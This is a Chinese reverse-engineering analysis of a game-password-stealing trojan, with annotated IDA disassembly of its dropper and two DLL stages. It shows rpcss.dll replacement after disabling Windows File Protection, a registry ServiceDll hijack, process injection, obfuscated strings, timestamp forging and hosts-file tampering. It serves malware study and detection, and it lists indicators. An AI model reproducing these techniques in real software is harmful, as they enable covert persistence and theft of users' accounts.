分析某个游戏木马 -电脑资料


    【文章作者】ZzAge

    【文章目标】游戏木马

    【相关工具】IDA

    【作者 Q Q】85400516

    【作者邮箱】zzage@163.com

    【作者主页】http://hi.baidu.com/zzage

    【文章日期】2009年01月10日

    此木马会替换系统文件、修改注册表、替换服务,以达到随系统启动的目的;修改hosts文件,屏蔽大部分游戏网站;然后利用HOOK技术窃取游戏账号的相关信息。

分析某个游戏木马

    1:

    ; --- Dropper EXE (Upack-packed, 32-bit x86), step 1: choose the drop path for the
    ; embedded payload. The sub_* helpers are cdecl-style (the caller cleans up with
    ; "add esp" in step 4). Comments below are translated from the author's Chinese
    ; annotations; what each sub_* does is the author's finding, not re-verified here.
    .Upack:004021DF            lea    eax, [ebp+FileName]

    .Upack:004021E5            push  eax        ; Dest: output buffer for the path

    .Upack:004021E6            call  sub_402305    ; builds "<temp dir>\~%06x.~~~" (author) - the drop target used in step 2

    2:

    ; --- Dropper EXE, step 2: write the embedded resource to the temp path from step 1.
    ; The same call shape appears in the dropped DLL at 100130E4, where IDA shows the third
    ; argument is the string "BIN" - so "nNumberOfBytesToWrite" below is an IDA auto-name
    ; and the value is most likely the resource type (lpType), with 65h the resource ID.
    ; NOTE(review): inferred from the DLL-side twin of this call, not from this excerpt.
    .Upack:004021F9            lea    eax, [ebp+FileName]

    .Upack:004021FF            push  eax        ; lpFileName: temp path from step 1

    .Upack:00402200            push  65h        ; __int16 - resource ID (see note above)

    .Upack:00402202            push  offset nNumberOfBytesToWrite ; IDA auto-name; likely the resource type "BIN" (see note above)

    .Upack:00402207            push  0          ; hModule = NULL: resource is taken from this EXE

    .Upack:00402209            call  sub_402348    ; extracts the resource to the path obtained above (author)

    3:

    ; --- Dropper EXE, step 3: build "<system dir>\rundll32.exe".
    ; aR19029_exerund is one IDA string object holding "r19029.exe" and "rundll32.exe"
    ; back to back; +0Ch selects the second name (NOTE(review): inferred from the name).
    .Upack:0040225F            lea    eax, [ebp+Dest]

    .Upack:00402265            push  eax        ; Dest: receives the path

    .Upack:00402266            push  (offset aR19029_exerund+0Ch) ; int - pointer into the string object, i.e. "rundll32.exe"

    .Upack:0040226B            call  sub_402417    ; builds "<system dir>\rundll32.exe" (author)

    4:

    ; --- Dropper EXE, step 4: build "<system dir>\r19029.exe" (the name the rundll32 copy gets).
    .Upack:0040227E            lea    eax, [ebp+NewFileName]

    .Upack:00402284            push  eax        ; Dest: receives the path

    .Upack:00402285            push  offset aR19029_exerund ; int - start of the string object, i.e. "r19029.exe"

    .Upack:0040228A            call  sub_402417    ; builds "<system dir>\r19029.exe" (author)

    .Upack:0040228F            add    esp, 30h    ; cdecl cleanup: 0x30 bytes = 12 dwords pushed for the preceding helper calls

    5:

    ; --- Dropper EXE, step 5: CopyFileA(rundll32.exe -> r19029.exe).
    ; The payload is later run through this renamed copy of rundll32.exe, presumably so the
    ; loading process is a copy of a legitimate Windows binary. bFailIfExists = 1, so the
    ; copy fails if r19029.exe is already present; no return-value check is visible here.
    .Upack:00402299            lea    eax, [ebp+NewFileName]

    .Upack:0040229F            push  1          ; bFailIfExists = TRUE

    .Upack:004022A1            push  eax        ; lpNewFileName = "<system dir>\r19029.exe"

    .Upack:004022A2            lea    eax, [ebp+Dest]

    .Upack:004022A8            push  eax        ; lpExistingFileName = "<system dir>\rundll32.exe"

    .Upack:004022A9            call  CopyFileA    ; copies <system dir>\rundll32.exe to <system dir>\r19029.exe (author)

    6:

    ; --- Dropper EXE, step 6: build the rundll32-style command line.
    ; wsprintfA(CommandLine, Source /* format */, NewFileName, FileName, Filename); per the
    ; author the result is "<system dir>\r19029.exe <dropped temp path> ins <path of this EXE>":
    ; the rundll32 copy loads the dropped DLL, calls its INS export, and passes the dropper's
    ; own path (which INS later deletes).
    .Upack:004022B6            lea    eax, [ebp+Filename]

    .Upack:004022BC            push  eax        ; arg 3: path of the running EXE (author)

    .Upack:004022BD            lea    eax, [ebp+FileName]

    .Upack:004022C3            push  eax        ; arg 2: temp path of the dropped resource

    .Upack:004022C4            lea    eax, [ebp+NewFileName]

    .Upack:004022CA            push  eax        ; arg 1: "<system dir>\r19029.exe"

    .Upack:004022CB            lea    eax, [ebp+Source]

    .Upack:004022D1            push  eax        ; LPCSTR format string

    .Upack:004022D2            lea    eax, [ebp+CommandLine]

    .Upack:004022D8            push  eax        ; LPSTR output buffer

    .Upack:004022D9            call  wsprintfA    ; produces "C:\windows\system32\r19029.exe <dropped resource path> ins <current file path>" (author)

    7:

    ; --- Dropper EXE, step 7: launch the command line built in step 6.
    .Upack:004022ED            lea    eax, [ebp+CommandLine]

    .Upack:004022F3            push  eax        ; lpCommandLine from step 6

    .Upack:004022F4            call  sub_4023C3    ; runs r19029.exe (the rundll32 copy) with that command line, which loads the dropped DLL and calls its INS export (author)

    ----------------------------------------------------------------------------

    下面分析的是由EXE释放出来的DLL文件。

    1:

    ; --- Dropped DLL (image base 10000000), part 1: dispatch on the parent process name.
    ; Literals such as "expl~~@orer.exe" carry a "~~@" filler that sub_10013BDB strips at
    ; run time, so "explorer.exe" never appears as a plain string in the file (presumably
    ; to defeat simple string scanning). byte_10011508 is identified by the author as the
    ; buffer holding the parent process name; StrStrIA is a case-insensitive substring search.
    .data:10013231            call  sub_1001389A  ; raises the current process's privileges (author)

    .data:10013236            push  offset String  ; lpString

    .data:1001323B            mov    ebx, offset String2 ; "expl~~@orer.exe"

    .data:10013240            push  offset SubStr  ; "~~@" - the filler to remove

    .data:10013245            push  ebx        ; Source

    .data:10013246            call  sub_10013BDB  ; removes "~~@" from "expl~~@orer.exe" (author)

    .data:1001324B            mov    esi, StrStrIA

    .data:10013251            add    esp, 0Ch    ; cdecl cleanup, 3 args

    .data:10013254            mov    edi, offset byte_10011508 ; parent process name buffer (author)

    .data:10013259            push  offset aCsrss_exe ; "csrss.exe"

    .data:1001325E            push  edi

    .data:1001325F            call  esi ; StrStrIA(parent name, "csrss.exe")

    .data:10013261            test  eax, eax

    .data:10013263            jz    short loc_10013273 ; not found -> try explorer.exe next; found (parent is csrss.exe) -> fall through (author)

    .data:1001326C            call  sub_1001335A  ; creates the event "shcsrss.exeEvent" and the mutex "csrss.exeMutex", then looks for files named sh00*.dll .. shff*.dll in the system directory (author)

    .data:10013271            jmp    short loc_100132BE

    2:

    ; --- Dropped DLL, part 2: loc_10013273 - parent is not csrss.exe; test for explorer.exe.
    ; ebx = String2 ("expl~~@orer.exe", de-filled by the call in part 1 per the author),
    ; edi = parent process name buffer, esi = StrStrIA.
    .data:10013273            push  ebx        ; "explorer.exe"

    .data:10013274            push  edi        ; parent process name buffer (author)

    .data:10013275            call  esi ; StrStrIA

    .data:10013277            test  eax, eax

    .data:10013279            jz    short loc_100132A6 ; not found -> try svchost.exe; found (parent is explorer.exe) -> fall through (author)

    .data:1001327B            call  sub_1001343B  ; looks for sh00*.dll .. shff*.dll in the system directory (author)

    .data:10013280            call  sub_100134B7  ; creates a mutex (author)

    .data:1001328C            call  sub_100132C2  ; not annotated by the author

    .data:10013298            push  ds:hModule    ; hLibModule - presumably this DLL's own module handle

    .data:1001329E            call  FreeLibrary   ; unloads itself from the host process

    .data:100132A4            jmp    short loc_100132BE

    3:

    ; --- Dropped DLL, part 3: loc_100132A6 - test for svchost.exe (the host of the rpcss service).
    .data:100132A6            push  offset aSvchost_exe ; "svchost.exe"

    .data:100132AB            push  edi        ; parent process name buffer (author)

    .data:100132AC            call  esi ; StrStrIA

    .data:100132AE            test  eax, eax

    .data:100132B0            jz    short loc_100132BE ; not found -> nothing to do; found (parent is svchost.exe) -> fall through (author)

    .data:100132B9            call  sub_10013309  ; raises privileges, replaces the service, and injects "<system dir>\sh19029.dll" into csrss.exe (author)

    4:

    ; --- Dropped DLL, part 4: sub_10012FB0 (name from the CODE XREF below) - system-file
    ; replacement. Copies this DLL over two names in the system directory, csrss.dll and
    ; rpcss.dll, after (a) asking sfc_os.dll to stop protecting rpcss.dll, (b) deleting the
    ; ServicePackFiles\i386 and dllcache copies Windows would restore it from, and (c) parking
    ; the genuine rpcss.dll as spcss.dll - only on first run, the move is skipped when
    ; spcss.dll already exists. Creation times of the replacements are copied from spcss.dll.
    ; Finally the "BIN" resource is dropped as sh19029.dll. Register roles: ebx = Buffer
    ; (path of this DLL, author), edi = CopyFileA, esi = DeleteFileA.
    ; NOTE(review): the artifacts this leaves - spcss.dll, csrss.dll and sh19029.dll in the
    ; system directory, and an rpcss.dll whose creation time matches spcss.dll - are what to
    ; look for on a suspect host. Apart from PathFileExistsA, no API result is checked here.
    .data:10012FC3            lea    eax, [ebp+Dest]

    .data:10012FC9            push  eax        ; Dest

    .data:10012FCA            push  offset aCsrss_dll ; "csrss.dll"

    .data:10012FCF            call  sub_1001376E  ; Dest = "<system dir>\csrss.dll" (author)

    .data:10012FD4            mov    edi, CopyFileA

    .data:10012FDA            pop    ecx        ; cdecl cleanup, 2 args

    .data:10012FDB            pop    ecx

    .data:10012FDC            lea    eax, [ebp+Dest]

    .data:10012FE2            push  0          ; bFailIfExists = FALSE: overwrite

    .data:10012FE4            mov    ebx, offset Buffer ; path of this DLL (author)

    .data:10012FE9            push  eax        ; lpNewFileName = "<system dir>\csrss.dll"

    .data:10012FEA            push  ebx        ; lpExistingFileName = own path

    .data:10012FEB            call  edi ; CopyFileA ; copies itself to "<system dir>\csrss.dll" (author)

    .data:10012FF4            lea    eax, [ebp+pszPath]

    .data:10012FFA            push  eax        ; Dest

    .data:10012FFB            push  offset aSpcss_dll ; "spcss.dll"

    .data:10013000            call  sub_1001376E  ; pszPath = "<system dir>\spcss.dll" (author) - where the genuine rpcss.dll is parked

    .data:10013005            lea    eax, [ebp+hFile]

    .data:1001300B            push  eax        ; Dest (IDA named this local hFile; it holds a path)

    .data:1001300C            push  offset aRpcss_dll ; "rpcss.dll"

    .data:10013011            call  sub_1001376E  ; hFile = "<system dir>\rpcss.dll" (author)

    .data:1001301D            lea    eax, [ebp+hFile]

    .data:10013023            push  eax        ; lpMultiByteStr = rpcss.dll path

    .data:10013024            call  sub_10012F44 ; calls into sfc_os.dll to turn off Windows File Protection for that file (author)

    .data:10013030            lea    eax, [ebp+FileName]

    .data:10013036            push  eax        ; Dest

    .data:10013037            push  offset a__Servicepackf ; "..\\ServicePackFiles\\i386\\rpcss.dll"

    .data:1001303C            call  sub_1001376E  ; FileName = "<system dir>\..\ServicePackFiles\i386\rpcss.dll" (author)

    .data:10013041            mov    esi, DeleteFileA

    .data:10013047            add    esp, 1Ch    ; cdecl cleanup: 7 dwords pushed for the helper calls since the pop ecx pair

    .data:1001304A            lea    eax, [ebp+FileName]

    .data:10013050            push  eax        ; lpFileName

    .data:10013051            call  esi ; DeleteFileA ; deletes the ServicePackFiles copy of rpcss.dll (author) so WFP has nothing to restore from

    .data:1001305A            lea    eax, [ebp+FileName]

    .data:10013060            push  eax        ; Dest

    .data:10013061            push  offset aDllcacheRpcss_ ; "dllcache\\rpcss.dll"

    .data:10013066            call  sub_1001376E  ; FileName = "<system dir>\dllcache\rpcss.dll" (author)

    .data:1001306B            pop    ecx        ; cdecl cleanup, 2 args

    .data:1001306C            lea    eax, [ebp+FileName]

    .data:10013072            pop    ecx

    .data:10013073            push  eax        ; lpFileName

    .data:10013074            call  esi ; DeleteFileA ; deletes the dllcache copy of rpcss.dll (author)

    .data:10013076            lea    eax, [ebp+pszPath]

    .data:1001307C            push  eax        ; pszPath = "<system dir>\spcss.dll"

    .data:1001307D            call  PathFileExistsA ; does spcss.dll already exist? (author)

    .data:1001307D                            ;

    .data:10013083            test  eax, eax

    .data:10013085            jnz    short loc_100130A4 ; exists -> the original was parked by an earlier run; skip the move

    .data:1001308E            lea    eax, [ebp+pszPath]

    .data:10013094            push  1          ; dwFlags = MOVEFILE_REPLACE_EXISTING

    .data:10013096            push  eax        ; lpNewFileName = "<system dir>\spcss.dll"

    .data:10013097            lea    eax, [ebp+hFile]

    .data:1001309D            push  eax        ; lpExistingFileName = "<system dir>\rpcss.dll"

    .data:1001309E            call  MoveFileExA    ; renames the genuine rpcss.dll to spcss.dll (author)

    .data:1001309E                            ;

    .data:100130A4

    .data:100130A4 loc_100130A4:                  ; CODE XREF: sub_10012FB0+D5 j

    .data:100130A4            lea    eax, [ebp+hFile]

    .data:100130AA            push  0          ; bFailIfExists = FALSE: overwrite

    .data:100130AC            push  eax        ; lpNewFileName = "<system dir>\rpcss.dll"

    .data:100130AD            push  ebx        ; lpExistingFileName = own path

    .data:100130AE            call  edi ; CopyFileA ; copies itself over "<system dir>\rpcss.dll" (author)

    .data:100130B0            lea    eax, [ebp+pszPath]

    .data:100130B6            push  eax        ; int - spcss.dll path (time source)

    .data:100130B7            lea    eax, [ebp+hFile]

    .data:100130BD            push  eax        ; hFile - rpcss.dll path (time target)

    .data:100130BE            call  sub_10013B15  ; sets the creation time of rpcss.dll to that of spcss.dll (author) - hides the replacement from a timestamp check

    .data:100130CA            lea    eax, [ebp+FileName]

    .data:100130D0            push  eax        ; Dest

    .data:100130D1            push  offset aSh19029_dll ; "sh19029.dll"

    .data:100130D6            call  sub_1001376E  ; FileName = "<system dir>\sh19029.dll" (author)

    .data:100130DB            lea    eax, [ebp+FileName]

    .data:100130E1            push  eax        ; lpFileName

    .data:100130E2            push  65h        ; __int16 - resource ID

    .data:100130E4            push  offset nNumberOfBytesToWrite ; "BIN" - resource type (IDA's auto-name is misleading)

    .data:100130E9            push  ds:hModule    ; hModule: this DLL carries the resource

    .data:100130EF            call  sub_100135E1  ; extracts the resource to "<system dir>\sh19029.dll" (author)

    .data:100130FB            lea    eax, [ebp+pszPath]

    .data:10013101            push  eax        ; int - spcss.dll path (time source)

    .data:10013102            lea    eax, [ebp+FileName]

    .data:10013108            push  eax        ; hFile - sh19029.dll path (time target)

    .data:10013109            call  sub_10013B15  ; sets the creation time of sh19029.dll to that of spcss.dll (author)

    .data:1001310E            add    esp, 28h    ; cdecl cleanup: 10 dwords pushed for the helper calls since the pop ecx pair

    .data:10013111            pop    edi

    .data:10013112            pop    esi

    .data:10013113            pop    ebx

    .data:10013114            leave

    .data:10013115            retn

    5:

    ; --- Dropped DLL, part 5: service hijack (the function entry is above this excerpt).
    ; arg_0 is the service name - "rpcss" per the author - and lpData the DLL path to
    ; install. Rewrites the service's registry key so svchost loads the replaced rpcss.dll
    ; under the LocalSystem account: ObjectName = "LocalSystem", Parameters\ServiceDll = lpData.
    ; Every RegXxx result is tested for ERROR_SUCCESS (0); any failure goes to loc_1001374C.
    ; NOTE(review): a ServiceDll value for rpcss that is not the OS-shipped path, or a
    ; changed ObjectName, is the registry indicator this function leaves behind.
    .data:1001369B            push  [ebp+arg_0]    ; service name, "rpcss" (author)

    .data:1001369E            lea    eax, [ebp+SubKey]

    .data:100136A4            push  offset Format  ; "SYSTEM\\CurrentControlSet\\Services\\%s"

    .data:100136A9            push  eax        ; Dest

    .data:100136AA            call  sprintf      ; SubKey = "SYSTEM\CurrentControlSet\Services\rpcss" (author)

    .data:100136B0            add    esp, 0Ch    ; cdecl cleanup, 3 args

    .data:100136BA            lea    eax, [ebp+hKey]

    .data:100136BD            push  eax        ; phkResult - the hKey local is reused for the opened key

    .data:100136BE            push  0F003Fh      ; samDesired = KEY_ALL_ACCESS

    .data:100136C3            lea    eax, [ebp+SubKey]

    .data:100136C9            push  0          ; ulOptions

    .data:100136CB            push  eax        ; lpSubKey

    .data:100136CC            push  [ebp+hKey]    ; hKey: parent key (its value is set outside the excerpt)

    .data:100136CF            call  RegOpenKeyExA  ; opens SYSTEM\CurrentControlSet\Services\rpcss (author)

    .data:100136DC            test  eax, eax

    .data:100136DE            jnz    short loc_1001374C ; non-zero = error -> bail out

    .data:100136E7            mov    esi, lstrlenA

    .data:100136ED            mov    edi, offset Data ; "LocalSystem"

    .data:100136F2            push  edi        ; lpString

    .data:100136F3            call  esi ; lstrlenA

    .data:100136F5            inc    eax        ; cbData = strlen + 1 (include the terminator)

    .data:100136F6            push  eax        ; cbData

    .data:100136F7            push  edi        ; lpData = "LocalSystem"

    .data:100136F8            mov    edi, RegSetValueExA

    .data:100136FE            push  2          ; dwType = REG_EXPAND_SZ

    .data:10013700            push  0          ; Reserved

    .data:10013702            push  offset ValueName ; "ObjectName"

    .data:10013707            push  [ebp+hKey]    ; hKey: the service key opened above

    .data:1001370A            call  edi ; RegSetValueExA ; ObjectName = "LocalSystem" (author): the service account the hijacked service runs under

    .data:1001370C            test  eax, eax

    .data:1001370E            jnz    short loc_1001374C ; error -> bail out

    .data:10013717            lea    eax, [ebp+phkResult]

    .data:1001371A            push  eax        ; phkResult

    .data:1001371B            push  offset SubKey  ; "Parameters"

    .data:10013720            push  [ebp+hKey]    ; hKey: the service key

    .data:10013723            call  RegOpenKeyA    ; opens the service's Parameters subkey (author)

    .data:10013729            test  eax, eax

    .data:1001372B            jnz    short loc_1001374C ; error -> bail out

    .data:10013734            push  [ebp+lpData]  ; lpString: the DLL path to install

    .data:10013737            call  esi ; lstrlenA

    .data:10013739            inc    eax        ; cbData = strlen + 1

    .data:1001373A            push  eax        ; cbData

    .data:1001373B            push  [ebp+lpData]  ; lpData

    .data:1001373E            push  2          ; dwType = REG_EXPAND_SZ

    .data:10013740            push  0          ; Reserved

    .data:10013742            push  offset aServicedll ; "ServiceDll"

    .data:10013747            push  [ebp+phkResult] ; hKey: Parameters subkey

    .data:1001374A            call  edi ; RegSetValueExA ; ServiceDll = its own path (author): svchost will load the malware as the service

    6:

    ; --- Dropped DLL, part 6: CreateThread(NULL, 0, StartAddress, NULL, 0, NULL).
    ; eax is pushed for every zero argument; its zeroing precedes this excerpt (assumed 0).
    .data:1001333B            push  eax        ; lpThreadId = NULL

    .data:1001333C            push  eax        ; dwCreationFlags = 0 (run immediately)

    .data:1001333D            push  eax        ; lpParameter = NULL

    .data:1001333E            push  offset StartAddress ; lpStartAddress

    .data:10013343            push  eax        ; dwStackSize = 0 (default)

    .data:10013344            push  eax        ; lpThreadAttributes = NULL

    .data:10013345            call  CreateThread  ; the thread creates the mutex "csrss.exeMutex" and injects "<system dir>\sh19029.dll" into csrss.exe (author)

    7:(INS导出函数)

    ; --- Dropped DLL, part 7: the INS export - the entry point the rundll32 copy (r19029.exe)
    ; is told to call. retn 10h = stdcall with four dword arguments, which matches the
    ; rundll32 entry-point signature (HWND, HINSTANCE, LPSTR cmdline, int); [ebp+lpFileName]
    ; would then be the command-line argument, i.e. the dropper EXE's own path.
    ; NOTE(review): inferred from retn 10h and the author's "deletes the carrier EXE" note.
    ; Sequence: write the config blob to "<system dir>\sh19029.ini"; replace rpcss.dll and
    ; drop sh19029.dll (sub_10012FB0); create the event "shcsrss.exeEvent" - if it already
    ; exists (ERROR_ALREADY_EXISTS) just signal it, otherwise inject sh19029.dll into
    ; explorer.exe; finally delete the dropper EXE, retrying every 20 ms until it is gone.
    .data:10013116            push  ebp

    .data:10013117            mov    ebp, esp

    .data:10013119            sub    esp, 514h    ; 0x514 bytes of locals (path buffers)

    .data:1001311F            push  esi

    .data:10013120            push  edi

    .data:10013128            lea    eax, [ebp+FileName]

    .data:1001312E            push  eax        ; Dest

    .data:1001312F            push  offset aSh19029_ini ; "sh19029.ini"

    .data:10013134            call  sub_1001376E  ; FileName = "<system dir>\sh19029.ini" (author)

    .data:10013140            mov    edi, 0B40h    ; 0xB40 = 2880 bytes: size of the config blob (the second-stage DLL reads the same amount back)

    .data:10013145            mov    esi, offset a7??4Hieib3 ; "7??4^HIeib`^3>" - the (encoded) config blob

    .data:1001314A            push  edi        ; nNumberOfBytesToWrite

    .data:1001314B            lea    eax, [ebp+FileName]

    .data:10013151            push  esi        ; lpBuffer

    .data:10013152            push  eax        ; lpFileName

    .data:10013153            call  sub_10013B94  ; writes the blob - the details of where stolen data is to be sent, per the author - to sh19029.ini

    .data:1001315F            push  edi        ; nNumberOfBytesToWrite

    .data:10013160            lea    eax, [ebp+FileName]

    .data:10013166            push  esi        ; lpBuffer

    .data:10013167            push  eax        ; lpFileName

    .data:10013168            call  sub_10013B94  ; same again (author); why the write is repeated is not explained

    .data:1001316D            add    esp, 20h    ; cdecl cleanup, 8 dwords

    .data:10013177            call  sub_10012FB0  ; replaces the system file rpcss.dll and drops "<system dir>\sh19029.dll" (author)

    .data:1001317C            xor    eax, eax

    .data:1001317E            push  offset Name    ; "shcsrss.exeEvent"

    .data:10013183            push  eax        ; bInitialState = FALSE

    .data:10013184            push  eax        ; bManualReset = FALSE

    .data:10013185            push  eax        ; lpEventAttributes = NULL

    .data:10013186            call  CreateEventA  ; named event doubles as an "already installed" marker (author: creates the event)

    .data:1001318C            mov    esi, eax    ; esi = hEvent

    .data:1001318E            call  GetLastError

    .data:10013194            cmp    eax, 0B7h    ; ERROR_ALREADY_EXISTS (183)

    .data:10013199            jnz    short loc_100131AB ; fresh event -> first install, go inject

    .data:1001319B            push  esi        ; hEvent

    .data:1001319C            call  SetEvent    ; already installed: just signal the existing instance

    .data:100131A2            push  esi        ; hObject

    .data:100131A3            call  CloseHandle

    .data:100131A9            jmp    short loc_100131F5

    .data:100131AB ; ---------------------------------------------------------------------------

    .data:100131AB

    .data:100131AB loc_100131AB:                  ; CODE XREF: ins+83 j

    .data:100131B2            push  esi        ; hObject

    .data:100131B3            call  CloseHandle

    .data:100131B9            push  offset String  ; lpString

    .data:100131BE            mov    esi, offset String2 ; "expl~~@orer.exe"

    .data:100131C3            push  offset SubStr  ; "~~@"

    .data:100131C8            push  esi        ; Source

    .data:100131C9            call  sub_10013BDB  ; strips the "~~@" filler -> "explorer.exe" (same helper as in part 1)

    .data:100131CE            lea    eax, [ebp+dwProcessId]

    .data:100131D4            push  eax        ; int - receives the PID

    .data:100131D5            push  esi        ; lpString2 = "explorer.exe"

    .data:100131D6            call  sub_100137C2  ; takes a process snapshot and finds explorer.exe (author)

    .data:100131E2            push  offset Buffer  ; lpBuffer - a global path; the author says the injected file is sh19029.dll, while sub_10012FB0 uses the same global as "own path" - which is right is not resolvable from this excerpt

    .data:100131E7            push  [ebp+dwProcessId] ; dwProcessId

    .data:100131ED            call  sub_10013919  ; injects the dropped sh19029.dll into explorer.exe (author)

    .data:100131F2            add    esp, 1Ch    ; cdecl cleanup, 7 dwords

    .data:100131F5

    .data:100131F5 loc_100131F5:                  ; CODE XREF: ins+93 j

    .data:100131F5            push  [ebp+lpFileName] ; pszPath: the carrier EXE path

    .data:100131F8            mov    esi, PathFileExistsA

    .data:100131FE

    .data:100131FE loc_100131FE:                  ; CODE XREF: ins+109 j

    .data:100131FE            call  esi ; PathFileExistsA ; loop: while the carrier EXE still exists ...

    .data:10013200            test  eax, eax

    .data:10013202            jz    short loc_10013221 ; gone -> done

    .data:1001320B            push  [ebp+lpFileName] ; lpFileName

    .data:1001320E            call  DeleteFileA    ; ... try to delete the carrier EXE (author); presumably fails while the dropper process still holds it, hence the retry

    .data:10013214            push  14h        ; dwMilliseconds = 20

    .data:10013216            call  Sleep

    .data:1001321C            push  [ebp+lpFileName] ; argument for the next PathFileExistsA

    .data:1001321F            jmp    short loc_100131FE

    .data:10013221 ; ---------------------------------------------------------------------------

    .data:10013221

    .data:10013221 loc_10013221:                  ; CODE XREF: ins+EC j

    .data:10013221            pop    edi

    .data:10013222            pop    esi

    .data:10013223            leave

    .data:10013224            retn  10h    ; stdcall, 4 dword args

    -----------------------------------------------------------------------

    以下分析的是由上述DLL释放出来的DLL文件。

    1:

    ; --- Second-stage DLL (image base 20000000; presumably sh19029.dll), sub_20008857 per
    ; the CODE XREFs below: dispatch on the parent process. Two string tricks appear here:
    ; literals such as "QQhxgame.exe" and "c~~@md ~~@/c ~~@de~~@l %s" are copied onto the
    ; stack with movsd/movsw/movsb and zero-padded, and "~~@" fillers are stripped at run
    ; time by sub_20007D57 - so neither "explorer.exe" nor "cmd /c del" exists as a plain
    ; string in the file. Per the author: parent QQhxgame.exe -> hook the game client's DLLs,
    ; rewrite the hosts file, exfiltrate; parent csrss.exe or explorer.exe -> inject
    ; sh19029.dll into QQhxgame.exe and delete the dropper's temp files; anything else ->
    ; the virtual-call variant aimed at QQLogin.exe/tenhx.dll. ebx = "~~@" throughout;
    ; var_4 is an object pointer passed in ecx (thiscall-style).
    ; NOTE(review): the hosts-file rewrite and the "cmd /c del <temp>\*.~~~" command run via
    ; WinExec are the host-observable actions in this excerpt.
    .data:2000886D            call  sub_200075AC  ; raises the current process's privileges (author)

    .data:20008872            mov    esi, offset aQqhxgame_exe ; "QQhxgame.exe"

    .data:20008877            lea    edi, [ebp+Source]

    .data:2000887D            movsd        ; copy "QQhxgame.exe\0" (13 bytes) onto the stack ...

    .data:2000887E            movsd

    .data:2000887F            movsd

    .data:20008880            movsb        ; ... 3 dwords + 1 byte

    .data:20008881            push  3Dh    ; ecx = 0x3D via push/pop

    .data:20008883            xor    eax, eax

    .data:20008885            pop    ecx

    .data:20008886            lea    edi, [ebp+var_FB]

    .data:2000888C            rep stosd    ; zero the rest of the buffer: 0x3D dwords + word + byte

    .data:2000888E            stosw

    .data:20008890            mov    esi, offset Default

    .data:20008895            mov    ebx, offset SubStr ; "~~@" - filler string, kept in ebx for the rest of the function

    .data:2000889A            stosb

    .data:2000889B            push  esi        ; lpString

    .data:2000889C            lea    eax, [ebp+Source]

    .data:200088A2            push  ebx        ; SubStr

    .data:200088A3            push  eax        ; Source = "QQhxgame.exe" (contains no filler, so presumably a no-op here)

    .data:200088A4            call  sub_20007D57  ; filler-stripping helper (same role as sub_10013BDB in the first DLL)

    .data:200088B0            lea    eax, [ebp+FileName]

    .data:200088B6            push  eax        ; Dest

    .data:200088B7            push  offset aSh19029_ini ; "sh19029.ini"

    .data:200088BC            call  sub_20007480  ; FileName = "<system dir>\sh19029.ini" (author) - the config written by the INS export

    .data:200088C1            push  0B40h        ; nNumberOfBytesToRead - the same 0xB40 the writer used

    .data:200088C6            lea    eax, [ebp+FileName]

    .data:200088CC            push  offset String2  ; lpBuffer

    .data:200088D1            push  eax        ; lpFileName

    .data:200088D2            call  sub_20007B6A  ; reads sh19029.ini into the String2 buffer (author)

    .data:200088DE            push  esi        ; lpString

    .data:200088DF            push  ebx        ; SubStr

    .data:200088E0            push  offset aExpl@orer_exe ; "expl~~@orer.exe"

    .data:200088E5            call  sub_20007D57  ; strips "~~@" -> "explorer.exe" (author)

    .data:200088EA            add    esp, 2Ch    ; cdecl cleanup, 11 dwords

    .data:200088F4            mov    esi, StrStrIA

    .data:200088FA            mov    edi, offset byte_2000485C ; parent process name buffer (author)

    .data:200088FF            push  offset aCsrss_exe ; "csrss.exe"

    .data:20008904            push  edi

    .data:20008905            call  esi ; StrStrIA

    .data:20008907            test  eax, eax

    .data:20008909            jnz    short loc_2000894D ; parent is csrss.exe -> injection/cleanup branch (author)

    .data:2000890B            push  offset aExpl@orer_exe ; "expl~~@orer.exe" (de-filled above)

    .data:20008910            push  edi

    .data:20008911            call  esi ; StrStrIA

    .data:20008913            test  eax, eax

    .data:20008915            jnz    short loc_2000894D ; parent is explorer.exe -> same branch (author)

    .data:20008917            lea    eax, [ebp+Source]

    .data:2000891D            push  eax        ; "QQhxgame.exe"

    .data:2000891E            push  edi

    .data:2000891F            call  esi ; StrStrIA

    .data:20008921            test  eax, eax

    .data:20008923            jz    short loc_20008939 ; parent is not QQhxgame.exe -> virtual-call variant; otherwise fall through (author)

    .data:2000892C            mov    ecx, [ebp+var_4]    ; this pointer

    .data:2000892F            call  sub_20008B74  ; inside the game client: creates a mutex, hooks the tradeclient.dll and controller.dll modules of qqhxgame.exe, rewrites the hosts file to redirect or block some game web sites, and sends the captured account data to the configured recipient (author)

    .data:20008934            jmp    loc_200089F0

    .data:20008939 ; ---------------------------------------------------------------------------

    .data:20008939

    .data:20008939 loc_20008939:                  ; CODE XREF: sub_20008857+CC j

    .data:20008940            mov    ecx, [ebp+var_4]    ; this pointer

    .data:20008943            mov    eax, [ecx]    ; eax = vtable

    .data:20008945            call  dword ptr [eax+10h] ; virtual method at vtable offset 0x10: creates a mutex, rewrites the hosts file (redirect/block game sites), finds the QQLogin.exe module inside QQhxgame.exe and hooks its tenhx.dll, and sends the captured account data to the configured recipient (author)

    .data:20008948            jmp    loc_200089F0

    .data:2000894D ; ---------------------------------------------------------------------------

    .data:2000894D

    .data:2000894D loc_2000894D:                  ; CODE XREF: sub_20008857+B2 j

    .data:2000894D                            ; sub_20008857+BE j

    .data:20008954            mov    ecx, [ebp+var_4]    ; this pointer

    .data:20008957            call  sub_20008A44  ; creates a mutex, snapshots processes to find QQhxgame.exe, locates "<system dir>\sh19029.dll" and injects it into QQhxgame.exe (author)

    .data:20008963            lea    eax, [ebp+Dest]

    .data:20008969            push  eax        ; lpBuffer

    .data:2000896A            push  104h        ; nBufferLength = MAX_PATH (260)

    .data:2000896F            call  GetTempPathA  ; Dest = temp directory (author)

    .data:20008975            lea    eax, [ebp+Dest]

    .data:2000897B            push  offset a_    ; "*.~~~" - the dropper's temp-file pattern

    .data:20008980            push  eax        ; Dest

    .data:20008981            call  strcat      ; Dest = "<temp>\*.~~~"

    .data:20008986            push  6          ; ecx = 6 via push/pop

    .data:20008988            mov    esi, offset aC@md@C@de@lS ; "c~~@md ~~@/c ~~@de~~@l %s"

    .data:2000898D            pop    ecx

    .data:2000898E            lea    edi, [ebp+Format]

    .data:20008994            rep movsd    ; copy the 26-byte literal (6 dwords + word) onto the stack

    .data:20008996            movsw

    .data:20008998            push  3Ah    ; ecx = 0x3A

    .data:2000899A            xor    eax, eax

    .data:2000899C            pop    ecx

    .data:2000899D            lea    edi, [ebp+var_2F6]

    .data:200089A3            rep stosd    ; zero the rest of Format: 0x3A dwords + word

    .data:200089A5            stosw

    .data:200089A7            push  offset Default  ; lpString

    .data:200089AC            lea    eax, [ebp+Format]

